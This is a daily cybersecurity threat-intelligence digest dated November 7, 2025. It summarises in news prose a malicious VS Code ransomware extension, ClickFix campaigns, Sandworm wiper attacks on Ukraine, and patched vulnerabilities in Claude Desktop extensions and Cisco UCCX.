Cyware Daily Threat Intelligence, November 07, 2025

The developer ecosystem is facing threats from within its own tools. A malicious Visual Studio Code extension named susvsex was discovered with ransomware capabilities, using GitHub as a C2 channel.

Russian state-backed hackers are waging a campaign of pure digital destruction against Ukraine. The Sandworm group is deploying data-wiping malware, like ZeroLot and Sting, designed to irretrievably destroy information. These attacks are not for profit but are aimed at sabotaging critical sectors like the grain industry and government.

Cisco has patched a critical vulnerability in its UCCX software that requires no authentication to exploit. Tracked as CVE-2025-20354, the flaw could allow a remote attacker to execute commands with root privileges.

Top Malware Reported in the Last 24 Hours

Malicious VS Code extension raises alarms

A malicious Visual Studio Code extension named "susvsex" was discovered, featuring basic ransomware capabilities and uploaded by a user identified as "suspublisher18." This extension, designed to automatically encrypt and exfiltrate files from specified directories upon launch, was promptly removed from the VS Code Extension Marketplace by Microsoft. It utilizes GitHub as a command-and-control channel, polling a private repository for commands and writing execution results back to it. Additionally, Datadog Security Labs identified 17 npm packages masquerading as legitimate SDKs that deploy Vidar Stealer malware. These packages, which were downloaded over 2,240 times before being taken down, execute malicious payloads through post-install scripts.

ClickFix malware attacks are evolving

ClickFix malware attacks have advanced to include features such as embedded video tutorials that guide victims through self-infection processes and automatic detection of the operating system to provide tailored commands. These attacks often employ social engineering tactics, tricking users into executing malicious code sourced from deceptive web pages. Recent campaigns have utilized fake Cloudflare CAPTCHA challenges, which not only pressure victims with countdown timers but also display misleading verification counters to enhance credibility. These sophisticated ClickFix attacks target all major operating systems and are primarily disseminated through malvertising and SEO poisoning, exploiting vulnerabilities in outdated WordPress plugins to inject harmful JavaScript into legitimate sites.

Sandworm targets Ukraine with data wipers

Russian state-backed hacker group Sandworm has intensified its attacks on Ukraine, deploying various data-wiping malware to disrupt critical sectors, particularly targeting the grain industry, government, and educational institutions. These operations occurred in June and September, reflecting a strategic shift towards undermining Ukraine's economic stability during the ongoing conflict. The malware, including variants like ZeroLot and Sting, aims to destroy digital information irretrievably, contrasting with ransomware that typically seeks financial gain through data theft. Initial access for these attacks was often facilitated by another group, UAC-0099, indicating a coordinated effort in cyber sabotage against Ukraine's vital economic resources.

Top Vulnerabilities Reported in the Last 24 Hours

Critical RCE bugs in Claude Desktop

Security researchers have identified critical RCE vulnerabilities in Claude Desktop extensions developed by Anthropic, specifically affecting the Chrome, iMessage, and Apple Notes connectors. These extensions, which have over 350,000 downloads, suffered from unsanitized command injection, allowing attackers to execute arbitrary commands with full system privileges. By manipulating user-provided input, attackers could inject malicious AppleScript commands that lead to severe security breaches, including data theft and unauthorized access. The vulnerabilities were confirmed with a high severity rating of 8.9 on the CVSS scale and have since been patched.

Patch this critical Cisco UCCX flaw

Cisco has addressed a critical vulnerability in its Unified Contact Center Express (UCCX) software, identified as CVE-2025-20354, which allows unauthenticated attackers to execute commands with root privileges through the Java RMI process. This flaw stems from inadequate authentication mechanisms, enabling potential exploitation by uploading crafted files. Additionally, a separate vulnerability in the CCX Editor application permits attackers to bypass authentication and run arbitrary scripts with admin rights. Cisco has not observed any public exploit code or evidence of these vulnerabilities being actively exploited. Alongside these issues, a high-severity flaw in the Cisco Identity Services Engine (ISE) could lead to denial-of-service conditions, while several other vulnerabilities could grant high-level privileges to attackers within Cisco's Contact Center products.